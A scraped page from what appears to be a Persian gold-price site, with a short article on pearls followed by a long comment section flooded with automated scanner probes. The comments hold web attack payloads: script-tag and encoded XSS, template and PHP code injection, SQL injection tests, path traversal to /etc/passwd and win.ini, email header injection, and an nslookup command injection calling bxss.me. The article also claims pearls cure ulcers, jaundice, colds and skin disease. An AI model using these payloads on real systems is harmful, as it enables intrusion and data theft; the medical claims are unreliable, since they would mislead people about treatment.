سامانه پیامکی طلا،سکه،ارز،تلفن گویا صفحه حرفه ای قیمت ها !!! اوقات شرعی وساعات نماز

ﺧﻮاص و ﻓﻮاﯾﺪ ﻣﺮوارﯾﺪ

از زﻣﺎن ﻫﺎي ﮔﺬﺷﺘﻪ ﺗﺎ اﻣﺮوز، اﺳﺘﻔﺎده از زﯾﻮرآﻻت ﺑﻪ ﻫﻤﺮاه ﮔﻮﻫﺮﻫﺎي ﻗﯿﻤﺘﯽ و ﻧﯿﻤﻪ ﻗﯿﻤﺘﯽ ﻣﻮرد ﺗﻮﺟﻪ ﺑﻮده اﺳﺖ. ﻋﻼوه ﺑﺮ ﮔﻮﻫﺮ ﻫﺎﯾﯽ ﻧﻈﯿﺮ اﻟﻤﺎس، زﻣﺮد و ﯾﺎﻗﻮت ﮐﻪ ﮐﺎﻧﯽ ﻫﺎﯾﯽ ﻫﺴﺘﻨﺪ ﮐﻪ از ﻣﻌﺎدن اﺳﺘﺨﺮاج ﻣﯽ ﺷﻮﻧﺪ، ﻣﯽ ﺗﻮان ﺑﻪ ﮔﻮﻫﺮ دیگری اﺷﺎره ﻧﻤﻮد ﮐﻪ در اﻋﻤﺎق اﻗﯿﺎﻧﻮس ﻫﺎ رﺷﺪ ﮐﺮده و ﺑﺪون ﻧﯿﺎز ﺑﻪ ﺗﺮاش و ﺻﯿﻘﻞ از زﯾﺒﺎﯾﯽ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮدي ﺑﺮﺧﻮردار اﺳﺖ.

ﺧﻮاص و ﻓﻮاﯾﺪ ﻣﺮوارﯾﺪ

ﻣﺮوارﯾﺪ از ﻋﺠﺎﯾﺐ ﻃﺒﯿﻌﺖ ﺑﻮده و در ﻓﺮﻫﻨﮓ ﻫﺎي ﻣﺘﻔﺎوت از ارزش ﻣﺎﻟﯽ و ﻣﻌﻨﻮي ﺑﺴﯿﺎري ﺑﻬﺮه ﻣﻨﺪ اﺳﺖ. ﻣﺮوارﯾﺪ ﺗﻮﺳﻂ ﺟﺎﻧﻮر ﻧﺮم ﺗﻨﯽ ﺗﻮﻟﯿﺪ ﻣﯽ ﺷﻮد ﮐﻪ ﻣﺎ آن را ﺻﺪف ﻣﯽ ﻧﺎﻣﯿﻢ. در ﺣﻘﯿﻘﺖ ﻫﻨﮕﺎﻣﯽ ﮐﻪ ﺟﺴﻢ ﺧﺎرﺟﯽ وارد ﺻﺪف ﻣﯽ ﺷﻮد، ﺻﺪف ﺑﻪ ﻣﻨﻈﻮر دﻓﻊ آن، ﻣﻮادي ﺗﺮﺷﺢ ﮐﺮده ﮐﻪ از ﺟﻤﻊ ﺷﺪن اﯾﻦ ﻣﻮاد ﻣﺮوارﯾﺪ شکل می گیرد.

مروارید ﺳﺒﺐ ﻟﻄﺎﻓﺖ ﻗﻠﺐ و روح شده و ﻋﺸﻖ ﺧﺎﻟﺼﺎﻧﻪ را ارﻣﻐﺎن ﻣﯽ آورد. ﺣﺲ از ﺧﻮد ﮔﺬﺷﺘﮕﯽ و ﻋﻔﺖ و ﭘﺎﮐﺪاﻣﻨﯽ را ﺗﻘﻮﯾﺖ و ﻏﻢ و اﻧﺪوه و ﺿﻌﻒ روﺣﯿﻪ را از ﺑﯿﻦ ﻣﯽ ﺑﺮد. این گوهر ﺑﺮاي دﻓﻊ ﻧﯿﺮوﻫﺎي ﻣﻨﻔﯽ و ﺟﺬب اﻧﺮژي ﻣﺜﺒﺖ ﻣﻔﯿﺪ ﻣﯽ ﺑﺎﺷﺪ. ﻫﻤﭽﻨﯿﻦ ﺑﺮاي ﺗﻘﻮﯾﺖ ﻣﻌﺪه و روده ﻫﺎ ﺗﺎﺛﯿﺮ ﺑﺴﺰاﯾﯽ دارد. مروارید ﺑﺎﻋﺚ ﺧﻮش ﺷﺎﻧﺴﯽ شده و ﺟﻬﺖ ﺗﻨﻈﯿﻢ ﻋﺎدات ﻧﺎدرﺳﺖ ﮐﻤﮏ زﯾﺎدي ﺑﻪ ﺷﻤﺎ ﻣﯽ ﮐﻨﺪ. این گوهر ﺑﺮاي درﻣﺎن زﺧﻢ ﻣﻌﺪه ﻣﻔﯿﺪ و ﻫﻤﭽﻨﯿﻦ ﺳﺒﺐ اﻓﺰاﯾﺶ روﺷﻨﺎﯾﯽ و ﻧﻮر ﭼﺸﻢ ﻣﯽ ﺷﻮد. از مروارید می توان برای درﻣﺎن ﺷﺐ ادراري، ﺑﯿﻤﺎري ﻫﺎي ﻣﺜﺎﻧﻪ و اﺧﺘﻼﻻت دﺳﺘﮕﺎه ﮔﻮارش، و ﻧﯿﺰ ﺳﺮﻣﺎﺧﻮردﮔﯽ، ﻋﻄﺴﻪ ﻫﺎي داﺋﻤﯽ سود برد. ﺑﺮاي ﻣﺸﮑﻼﺗﯽ از ﻗﺒﯿﻞ ﺑﻮي ﺑﺪ دﻫﺎن ، اﺳﻬﺎل ، ﻧﻔﺦ و ﺗﻬﻮع، ﯾﺮﻗﺎن و ﺑﯿﻤﺎري ﻫﺎي ﭘﻮﺳﺘﯽ نیز ﻣﻔﯿﺪ است.

ﺑﺮﺧﻮرد ﺳﻄﺢ ﻣﺮوارﯾﺪ ﺑﺎ اﺟﺴﺎم و ﺗﻤﺎس آن ﺑﺎ ﮐﺜﯿﻔﯽ، اﺳﯿﺪﻫﺎ، ﻣﻮاد آراﯾﺸﯽ، اﺳﭙﺮي و ﻋﻄﺮﻫﺎ در دوام و ﺟﻼي ﻣﺮوارﯾﺪ اﺛﺮ ﻣﻨﻔﯽ ﻣﯽ ﮔﺬارد.

اﻣﺮوزه ﻣﺮوارﯾﺪ ﻫﺎي ﻃﺒﯿﻌﯽ ﺑﻪ دﻟﯿﻞ ﺷﮑﺎر ﺑﯽ روﯾﻪ ﺻﺪف ﺑﺴﯿﺎر ﮐﻤﯿﺎب ﺑﻮده و در ﻧﺘﯿﺠﻪ ﺑﺴﯿﺎر ارزﺷﻤﻨﺪ ﻫﺴﺘﻨﺪ. از اﯾﻦ رو اﻧﺴﺎن ﺑﻪ ﻣﻨﻈﻮر ﺣﻔﻆ ارزش و ﻗﺪﻣﺖ اﯾﻦ ﮔﻮﻫﺮ زﯾﺒﺎ اﻗﺪام ﺑﻪ ﭘﺮورش ﻣﺮوارﯾﺪ ﮐﺮده اﺳﺖ. اﻣﺮوزه ﺑﺴﯿﺎري از ﻣﺮوارﯾﺪ ﻫﺎي ﻣﻮﺟﻮد در ﺑﺎزار ﻫﺎي ﺟﻬﺎﻧﯽ، ﻣﺮوارﯾﺪ ﻫﺎي ﭘﺮورﺷﯽ ﺑﻮده ﮐﻪ در واﻗﻊ اﻧﺴﺎن ﺑﻪ ﻧﻮﻋﯽ در رﺷﺪ آن دﺧﺎﻟﺖ داﺷﺘﻪ اﺳﺖ و در ﻧﺘﯿﺠﻪ از ﻗﯿﻤﺖ پایین تری ﻧﺴﺒﺖ ﺑﻪ ﻧﻤﻮﻧﻪ ﻃﺒﯿﻌﯽ ﺧﻮد ﺑﺮﺧﻮردار اﺳﺖ.

اﻣﺮوزه ﺣﺪود 8 ﻫﺰار ﮔﻮﻧﻪ ﻣﺘﻔﺎوت ﺻﺪف ﺷﻨﺎﺳﺎﯾﯽ ﺷﺪه ﮐﻪ ﻓﻘﻂ 20 ﮔﻮﻧﻪ از آﻧﻬﺎ ﻣﯽ ﺗﻮاﻧﻨﺪ ﻣﺮوارﯾﺪ ﭘﺮورش دﻫﻨﺪ.

نظرات
ديدگاه هاي ارسال شده توسط شما، پس از تاييد توسط سايت طلا در وب سايت منتشر خواهد شد
0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1RDXNM[!+!]

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1tTCRm
d2MN(9826)

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1}body{acu:Expre/**/SSion(d2MN(9080))}

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
[url=http://www.vulnweb.com][/url]

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
?

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1<ScRiPt>d2MN(9628)</sCripT>

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1u003CScRiPtd2MN(9503)u003C/sCripTu003E

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
%31%3C%53%63%52%69%50%74%20%3E%64%32%4D%4E%289962%29%3C%2F%73%43%72%69%70%54%3E

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9694)

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9302)

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9939)

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9136)

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1ZXPBZ[!+!]

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9176)

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
{{9999156*10000341}}

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
CWS000x?=?1N?@E߮??I)?@?? ?HiP"D?F? G&َ7??܂?rX;!S??̛????7Jq???.?>?p?c?l??zG?ܾM??dkj?,??(???T?Jj)?"?T7$??H?D6)? x)??ؒ?C?|?Q?Nc?b??? b_&?5 h??g?
]s??0Q?L

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
acux1136??z1??z2a?bcxuca1136

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
acu1808<s1﹥s2ʺs3ʹuca1808

0 0

ypaibuqj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
19038512

0 0

luvbkjpa 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
index.php/.

0 0

mrvxehod 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
/www.vulnweb.com

0 0

rsqdjmnf 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
1????%2527%2522

0 0

givvojjc 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
http://hitvQZf8dBkGm.bxss.me/

0 0

luvbkjpa 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
index.php

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

paudmwcv 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
${@print(md5(acunetix_wvs_security_test))}

0 0

paudmwcv 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
";print(md5(acunetix_wvs_security_test));$a="

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
................windowswin.ini

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
????????????????????????????????????????????????windows??win.ini

0 0

nhpvakyq 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
testasp.vulnweb.com

0 0

paudmwcv 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
;print(md5(acunetix_wvs_security_test));

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../../../../../../../../../../windows/win.ini.jpg

0 0

nhpvakyq 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
http://testasp.vulnweb.com/t/fit.txt?.jpg

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
C:WINDOWSsystem32driversetchosts

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../../../../../../../../../../windows/win.ini

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
WEB-INFweb.xml

0 0

nhpvakyq 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
Http://testasp.vulnweb.com/t/fit.txt

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
/WEB-INF/web.xml

0 0

nhpvakyq 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
1some_inexistent_file_with_long_name.jpg

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
WEB-INF/web.xml

0 0

nhpvakyq 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
/../../../../../../../etc/passwd

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
file:///etc/passwd

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
..??..??..??..??..??..??..??..??etc/passwd

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
%2fetc%2fpasswd

0 0

xlxpquxj 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
${9999503+10000243}

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
/etc/passwd

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

pxktwwyi 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
to@example.com>
bcc:013405.51-3013.51.9c67f.1@bxss.me

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

pxktwwyi 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1
bcc:013405.51-3011.51.9c67f.1@bxss.me

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
../../../../../../../../../../etc/passwd.jpg

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
../../../../../../../../../../../../../../../proc/version

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
../../../../../../../../../../etc/passwd

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
-1" OR 2+698-698-1=0+0+0+1 --

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
-1 OR 2+798-798-1=0+0+0+1

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
-1 OR 2+708-708-1=0+0+0+1 --

0 0

bcnuvbmc 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
$(nslookup dns.ce.13405.51-2993.51.9c67f.1.bxss.me)

0 0

jwtkquan 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
aHwlrcRx

0 0

hkoyqjma 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
D6wwBN3N

0 0

bcnuvbmc 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
set|set&set

0 0

dffqckkt 50 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1GBWIO[!+!]

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
11waLo
ut87(9533)

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1}body{acu:Expre/**/SSion(ut87(9313))}

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
[url=http://www.vulnweb.com][/url]

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
?

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1<ScRiPt>ut87(9012)</sCripT>

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1u003CScRiPtut87(9118)u003C/sCripTu003E

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
%31%3C%53%63%52%69%50%74%20%3E%75%74%38%37%289417%29%3C%2F%73%43%72%69%70%54%3E

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9263)

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9464)

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9900)

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9465)

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1CTYSG[!+!]

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9646)

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
{{9999558*10000412}}

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
CWS000x?=?1N?@E߮??I)?@?? ?HiP"D?F? G&َ7??܂?rX;!S??̛????7Jq???.?>?p?c?l??zG?ܾM??dkj?,??(???T?Jj)?"?T7$??H?D6)? x)??ؒ?C?|?Q?Nc?b??? b_&?5 h??g?
]s??0Q?L

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
acux5682??z1??z2a?bcxuca5682

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
acu1386<s1﹥s2ʺs3ʹuca1386

0 0

cuirvnoh 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
19298837

0 0

jysyddds 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/www.vulnweb.com

0 0

eercpdmu 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1????%2527%2522

0 0

djdehxra 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
index.php/.

0 0

djdehxra 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
index.php

0 0

tjluhoxf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
${@print(md5(acunetix_wvs_security_test))}

0 0

tjluhoxf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
";print(md5(acunetix_wvs_security_test));$a="

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

tjluhoxf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
;print(md5(acunetix_wvs_security_test));

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
................windowswin.ini

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
????????????????????????????????????????????????windows??win.ini

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../windows/win.ini.jpg

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
C:WINDOWSsystem32driversetchosts

0 0

adkheglm 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
testasp.vulnweb.com

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../windows/win.ini

0 0

adkheglm 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
http://testasp.vulnweb.com/t/fit.txt?.jpg

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
WEB-INFweb.xml

0 0

adkheglm 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
Http://testasp.vulnweb.com/t/fit.txt

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/WEB-INF/web.xml

0 0

adkheglm 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1some_inexistent_file_with_long_name.jpg

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
WEB-INF/web.xml

0 0

adkheglm 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/../../../../../../../etc/passwd

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
file:///etc/passwd

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
..??..??..??..??..??..??..??..??etc/passwd

0 0

gidexpbd 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
${9999948+10000141}

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
%2fetc%2fpasswd

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/etc/passwd

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../etc/passwd.jpg

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../../../../../../proc/version

0 0

gbsvwfkm 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
to@example.com>
bcc:013405.38-3380.38.e1858.1@bxss.me

0 0

mpeaxeuf 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../etc/passwd

0 0

gbsvwfkm 50 سال میگه :

